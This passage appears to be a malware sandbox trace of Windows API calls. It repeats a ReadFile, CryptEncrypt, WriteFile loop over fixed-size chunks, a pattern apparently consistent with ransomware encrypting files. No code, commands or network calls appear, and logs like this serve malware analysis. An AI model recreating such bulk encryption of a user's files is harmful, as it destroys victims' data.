(in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.294] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.295] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.295] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.295] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.295] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.296] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.296] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.296] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.296] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.296] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.297] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.297] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.297] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.297] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.297] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.297] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.298] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.298] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.298] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.298] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.299] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.299] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.299] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.299] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.299] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.300] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.300] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.300] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.300] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.300] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.300] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 